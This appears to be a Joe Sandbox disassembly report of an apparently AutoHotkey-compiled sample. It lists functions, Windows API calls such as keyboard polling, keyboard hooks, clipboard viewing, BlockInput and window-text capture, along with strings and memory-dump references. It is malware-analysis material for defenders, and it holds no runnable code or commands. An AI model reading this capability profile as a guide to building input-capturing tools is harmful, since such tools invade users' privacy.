Part of subcall function 004042D0: GlobalAlloc.KERNEL32(00000002,00000001,00404294,?,?,?,?,00412B99,004987E9,00457210,?,00000000,036A0048), ref: 004042DE
Part of subcall function 004042D0: GlobalFix.KERNEL32(00000000), ref: 00404303
Part of subcall function 004042D0: GlobalFree.KERNEL32(00000000), ref: 00404314

Part of subcall function 00404250: _strncpy.LIBCMT ref: 004042A9

IsClipboardFormatAvailable.USER32(00000001), ref: 0043C823
IsClipboardFormatAvailable.USER32(0000000F), ref: 0043C82B
lstrcmpi.KERNEL32(?,00000000), ref: 0043C991
IsClipboardFormatAvailable.USER32(00000001), ref: 0043CA72
IsClipboardFormatAvailable.USER32(0000000F), ref: 0043CA7A

Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(00000001), ref: 00404096
Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040409C
Part of subcall function 00404080: GlobalUnWire.KERNEL32(00000000), ref: 0040410F
Part of subcall function 00404080: CloseClipboard.USER32 ref: 0040411B
Part of subcall function 00404080: GlobalFix.KERNEL32(00000000), ref: 00404136
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404194
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,00000000), ref: 004041BA
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404207
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,000003E7), ref: 0040422D

Part of subcall function 00404340: EmptyClipboard.USER32 ref: 00404364
Part of subcall function 00404340: GlobalUnWire.KERNEL32(00000000), ref: 0040437B
Part of subcall function 00404340: CloseClipboard.USER32 ref: 00404384
Part of subcall function 00404340: GlobalUnWire.KERNEL32(00000000), ref: 004043C7
Part of subcall function 00404340: GlobalFree.KERNEL32(00000000), ref: 004043D8
Part of subcall function 00404340: GlobalUnWire.KERNEL32 ref: 004043EE
Part of subcall function 00404340: CloseClipboard.USER32 ref: 004043F3
Part of subcall function 00404340: SetClipboardData.USER32(?,00000000), ref: 00404412
Part of subcall function 00404340: GlobalUnWire.KERNEL32 ref: 0040442E
Part of subcall function 00404340: CloseClipboard.USER32 ref: 00404433

Part of subcall function 00412570: GetTickCount.KERNEL32(?,0043C47A), ref: 0041257F

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Part of subcall function 00486FE5: __mbctoupper_l.LIBCMT ref: 00486FEF

Strings

Out of memory., xrefs: 0043C339, 0043C3B5, 0043C78E, 0043C7A6
<<>>, xrefs: 0043C831, 0043CA80
Memory limit reached (see #MaxMem in the help file)., xrefs: 0043C591
Random, xrefs: 0043C21A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004392C0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 130window

APIs

SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A

Part of subcall function 0042CA10: GetTickCount.KERNEL32 ref: 0042CAED

Part of subcall function 0040C210: __itow.LIBCMT ref: 0040C2B0
Part of subcall function 0040C210: __itow.LIBCMT ref: 0040C411
Part of subcall function 0040C210: __itow.LIBCMT ref: 0040C43B
Part of subcall function 0040C210: CharUpperA.USER32(?), ref: 0040C452

Part of subcall function 0042E020: GetForegroundWindow.USER32 ref: 0042E030
Part of subcall function 0042E020: GetWindowTextA.USER32(00000000,?,00000064), ref: 0042E047
Part of subcall function 0042E020: _strncpy.LIBCMT ref: 0042E0F0

SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
IsWindowVisible.USER32(000601DA), ref: 004393DA
ShowWindow.USER32(000601DA,00000005), ref: 004393F3
IsIconic.USER32(000601DA), ref: 004393FC
ShowWindow.USER32(000601DA,00000009), ref: 0043940E
GetForegroundWindow.USER32 ref: 00439410
SetForegroundWindow.USER32(000601DA), ref: 00439421

Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0047553B
Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 0047555A
Part of subcall function 00475520: FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0047556C
Part of subcall function 00475520: IsIconic.USER32(00000000), ref: 00475583
Part of subcall function 00475520: ShowWindow.USER32(00000000,00000009), ref: 00475590
Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004755C1
Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 004755E7
Part of subcall function 00475520: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00475600
Part of subcall function 00475520: SetForegroundWindow.USER32(00000000), ref: 00475621
Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 00475643
Part of subcall function 00475520: GetWindow.USER32(00000000,00000004), ref: 0047565A
Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,?,00000000), ref: 004756BE
Part of subcall function 00475520: AttachThreadInput.USER32(?,?,00000000), ref: 004756D7
Part of subcall function 00475520: BringWindowToTop.USER32(00000000), ref: 004756E2

SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C

Strings

Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script., xrefs: 00439310

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00451070, Relevance: 10.8, APIs: 7, Instructions: 323com

APIs

GetFileAttributesA.KERNEL32(?), ref: 0045117A
FindFirstFileA.KERNEL32(?,?), ref: 00451196
FindClose.KERNEL32(00000000), ref: 004511A6
CoInitialize.OLE32(00000000), ref: 004511AE
CoCreateInstance.OLE32(00496770,00000000,00000001,00496760,?), ref: 004511C7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000105), ref: 00451209
CoUninitialize.OLE32 ref: 004513A2

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00441700, Relevance: 10.6, APIs: 7, Instructions: 144

APIs

CreateFileA.KERNEL32(?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044173A
GetFileSizeEx.KERNEL32(00000000,?,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 0044174D
CloseHandle.KERNEL32(00000000), ref: 00441756
FindFirstFileA.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00441766
GetLastError.KERNEL32(?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00441771
FindClose.KERNEL32(00000000,?,00000000,?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 004417AD
__alldiv.INT64 ref: 0044181B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004726E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50

APIs

__Stoull.NTSTC_LIBCMT ref: 004726F8
FindFirstFileA.KERNEL32(00000000,?,?,?,?), ref: 0047271D
FindClose.KERNEL32(00000000,?,?,?), ref: 00472729
GetFileAttributesA.KERNEL32(00000000,?,?,?), ref: 00472744

Strings

\\?\, xrefs: 004726F2

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00404620, Relevance: 6.1, APIs: 4, Instructions: 51clipboard

APIs

GetTickCount.KERNEL32(761C44CF,00000000,00000000,004040C7,004AC8E0,?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000), ref: 0040463B
OpenClipboard.USER32(000601DA), ref: 0040464C
GetTickCount.KERNEL32(?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000,?), ref: 00404660
OpenClipboard.USER32(000601DA), ref: 0040469A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00415590, Relevance: 4.5, APIs: 3, Instructions: 45clipboardwindow

APIs

PostMessageA.USER32(000601DA,00000415,00000001,00000000), ref: 004155D4
SetClipboardViewer.USER32(000601DA), ref: 004155E7
ChangeClipboardChain.USER32(000601DA,?), ref: 00415629

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0047C075, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 411

APIs

_strncmp.LIBCMT ref: 0047CA3A

Strings

), xrefs: 0047C0B7

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00440F8D, Relevance: 3.1, APIs: 2, Instructions: 55time

APIs

FindFirstFileA.KERNEL32(004987E9,?), ref: 00440FEB
GetLastError.KERNEL32(?,?), ref: 00440FF6
FindClose.KERNEL32(00000000), ref: 00441034
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044108D

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00471240, Relevance: 1.4, Strings: 1, Instructions: 168

Strings

%04d%02d, xrefs: 004713F9

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00410450, Relevance: .1, Instructions: 112

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0040D6C9, Relevance: 37.1, APIs: 17, Strings: 4, Instructions: 353keyboardwindowthread

APIs

Part of subcall function 00410200: GetCursorPos.USER32(004A9140), ref: 00410298
Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 004102B5
Part of subcall function 00410200: GetSystemMetrics.USER32(00000000), ref: 00410310
Part of subcall function 00410200: GetSystemMetrics.USER32(00000001), ref: 00410316
Part of subcall function 00410200: GetCursorPos.USER32(?), ref: 00410375

Part of subcall function 0040E650: GetTickCount.KERNEL32 ref: 0040E6A8
Part of subcall function 0040E650: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040E6CB
Part of subcall function 0040E650: GetTickCount.KERNEL32(?,00000000), ref: 0040E6F5
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A0), ref: 0040E734
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A1), ref: 0040E747
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A2), ref: 0040E75B
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A3), ref: 0040E76F
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A4), ref: 0040E783
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A5), ref: 0040E797
Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005B), ref: 0040E7A8
Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005C), ref: 0040E7B9
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A0), ref: 0040E8DE
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A1), ref: 0040E8F1
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A2), ref: 0040E905
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A3), ref: 0040E919
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A4), ref: 0040E92D
Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A5), ref: 0040E941
Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005B), ref: 0040E952
Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005C), ref: 0040E963

Part of subcall function 0040E9F0: __itow.LIBCMT ref: 0040EA0E
Part of subcall function 0040E9F0: GetTickCount.KERNEL32(?,?,00000000,?,?,?), ref: 0040EA39
Part of subcall function 0040E9F0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EA5C
Part of subcall function 0040E9F0: GetTickCount.KERNEL32(?,00000000,?,?,?), ref: 0040EA81

GetAsyncKeyState.USER32(0000005B), ref: 0040D688
GetAsyncKeyState.USER32(0000005C), ref: 0040D696
GetForegroundWindow.USER32 ref: 0040D6F2
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040D6FF
GetKeyboardLayout.USER32(00000000), ref: 0040D708

Part of subcall function 00411970: VkKeyScanExA.USER32(00000020,00000000), ref: 004119F6

Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A0), ref: 00411465
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A1), ref: 00411478
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A2), ref: 0041148C
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A3), ref: 004114A0
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A4), ref: 004114B4
Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A5), ref: 004114C8
Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005B), ref: 004114D9
Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005C), ref: 004114EA

GetTickCount.KERNEL32 ref: 0040D757
GetWindowThreadProcessId.USER32(00000000), ref: 0040E585

Part of subcall function 00410C30: GetKeyState.USER32(?), ref: 00410C3B
Part of subcall function 00410C30: GetKeyState.USER32(?), ref: 00410C6A
Part of subcall function 00410C30: GetForegroundWindow.USER32 ref: 00410CA4
Part of subcall function 00410C30: GetWindowThreadProcessId.USER32(00000000), ref: 00410CAB
Part of subcall function 00410C30: GetKeyState.USER32(00000014), ref: 00410CEE

GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040D88C
GetProcAddress.KERNEL32(00000000), ref: 0040D893
GetTickCount.KERNEL32 ref: 0040D8E1
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040D906
GetTickCount.KERNEL32 ref: 0040D930
__Stoull.NTSTC_LIBCMT ref: 0040DA37
__Stoull.NTSTC_LIBCMT ref: 0040DA4B
__Stoull.NTSTC_LIBCMT ref: 0040DA84

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

__Stoull.NTSTC_LIBCMT ref: 0040DB33
__Stoull.NTSTC_LIBCMT ref: 0040DBA2
__Stoull.NTSTC_LIBCMT ref: 0040DBBC
PostMessageA.USER32(?,00000102,?,00000000), ref: 0040DD0A
GetAsyncKeyState.USER32(000000A0), ref: 0040DDA2
GetAsyncKeyState.USER32(000000A1), ref: 0040DDB5
GetAsyncKeyState.USER32(000000A2), ref: 0040DDC9
GetAsyncKeyState.USER32(000000A3), ref: 0040DDDD
GetAsyncKeyState.USER32(000000A4), ref: 0040DDF1
GetAsyncKeyState.USER32(000000A5), ref: 0040DE05
GetAsyncKeyState.USER32(0000005B), ref: 0040DE16
GetAsyncKeyState.USER32(0000005C), ref: 0040DE27
GetTickCount.KERNEL32 ref: 0040DEC9
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DEEE
GetTickCount.KERNEL32 ref: 0040DF18
__Stoull.NTSTC_LIBCMT ref: 0040DF44
__Stoull.NTSTC_LIBCMT ref: 0040DFC0
PostMessageW.USER32(00000000,00000102,?,00000000), ref: 0040DFF1
__itow.LIBCMT ref: 0040E021

Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A0), ref: 0040EB06
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A1), ref: 0040EB19
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A2), ref: 0040EB2D
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A3), ref: 0040EB41
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A4), ref: 0040EB55
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(000000A5), ref: 0040EB69
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(0000005B), ref: 0040EB7A
Part of subcall function 0040EAD0: GetAsyncKeyState.USER32(0000005C), ref: 0040EB8B

Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A0), ref: 0040D0D5
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A1), ref: 0040D0E8
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A2), ref: 0040D0FC
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A3), ref: 0040D110
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A4), ref: 0040D124
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A5), ref: 0040D138
Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005B), ref: 0040D149
Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005C), ref: 0040D15A
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A0), ref: 0040D1DD
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A1), ref: 0040D1F0
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A2), ref: 0040D204
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A3), ref: 0040D218
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A4), ref: 0040D22C
Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A5), ref: 0040D240
Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005B), ref: 0040D251
Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005C), ref: 0040D262
Part of subcall function 0040D090: SendInput.USER32(00000002,?,0000001C), ref: 0040D4C7

PostMessageA.USER32(?,00000102,00000000,00000000), ref: 0040E216

Part of subcall function 00411DB0: VkKeyScanExA.USER32(00000000,00000000), ref: 00411DB9

Part of subcall function 00410D40: GetWindowThreadProcessId.USER32(?,00000000), ref: 00411409

Part of subcall function 00410820: SendInput.USER32(00000000,00000000,0000001C), ref: 00410880
Part of subcall function 00410820: GetForegroundWindow.USER32 ref: 004108C3
Part of subcall function 00410820: SetWindowsHookExA.USER32(00000001,0040EC50,00400000,00000000), ref: 00410900

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

GetTickCount.KERNEL32 ref: 0040E31E
GetAsyncKeyState.USER32(000000A0), ref: 0040E38C
GetAsyncKeyState.USER32(000000A1), ref: 0040E39F
GetAsyncKeyState.USER32(000000A2), ref: 0040E3B3
GetAsyncKeyState.USER32(000000A3), ref: 0040E3C7
GetAsyncKeyState.USER32(000000A4), ref: 0040E3DB
GetAsyncKeyState.USER32(000000A5), ref: 0040E3EF
GetAsyncKeyState.USER32(0000005B), ref: 0040E400
GetAsyncKeyState.USER32(0000005C), ref: 0040E411
GetKeyState.USER32(00000014), ref: 0040E4B1
GetKeyState.USER32(00000014), ref: 0040E4B9

Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D

GetForegroundWindow.USER32 ref: 0040E4ED
GetWindowThreadProcessId.USER32(00000000), ref: 0040E4F4
AttachThreadInput.USER32(00000E10,?,00000000), ref: 0040E529
GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040E552
GetProcAddress.KERNEL32(00000000), ref: 0040E559
GetForegroundWindow.USER32 ref: 0040E57E

Strings

BlockInput, xrefs: 0040D882, 0040E548
user32, xrefs: 0040D887, 0040E54D
^+!#{}, xrefs: 0040D948
@, xrefs: 0040D9BD

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0043EE10, Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 449window

APIs

_strncpy.LIBCMT ref: 0043EE9A
__Stoull.NTSTC_LIBCMT ref: 0043EEB5
GetFileAttributesA.KERNEL32(?), ref: 0043EF08
_strncpy.LIBCMT ref: 0043EF3D
_strncpy.LIBCMT ref: 0043EF68
_strncpy.LIBCMT ref: 0043EF91

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

_strncpy.LIBCMT ref: 0043F01E
_strncpy.LIBCMT ref: 0043F099
PostMessageA.USER32(000601DA,00000044,00000403,00000000), ref: 0043F22A
75B0A2A9.COMDLG32(?), ref: 0043F256
SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 0043F295

Strings

\, xrefs: 0043EEFA
::{, xrefs: 0043EEA8
%s%c%s%cAll Files (*.*)%c*.*%c, xrefs: 0043F0DF
The maximum number of File Dialogs has been reached., xrefs: 0043EE49
C:\Users\user\Desktop, xrefs: 0043F287, 0043F290
All Files (*.*), xrefs: 0043F127
X, xrefs: 0043F06E
Select File - %s, xrefs: 0043EFA8

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0044B390, Relevance: 31.9, APIs: 11, Strings: 7, Instructions: 376window

APIs

__Stoull.NTSTC_LIBCMT ref: 0044B505

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

__Stoull.NTSTC_LIBCMT ref: 0044B545
__Stoull.NTSTC_LIBCMT ref: 0044B588
__Stoull.NTSTC_LIBCMT ref: 0044B5DD
__Stoull.NTSTC_LIBCMT ref: 0044B60E
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0044B688
SendMessageA.USER32(?,00001007,00000000,00000008), ref: 0044B707
SendMessageA.USER32(?,00001006,00000000,00000008), ref: 0044B753
SendMessageA.USER32(?,00001013,?,00000000), ref: 0044B778
SendMessageA.USER32(00000000,00001006,00000000,?), ref: 0044B7CC
SendMessageA.USER32(001BC918,0000102F,?,00000000), ref: 0044B822

Strings

Focus, xrefs: 0044B53F
Icon, xrefs: 0044B608
Select, xrefs: 0044B4F8
Check, xrefs: 0044B582
I, xrefs: 0044B810
Col, xrefs: 0044B5D7
Vis, xrefs: 0044B632

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
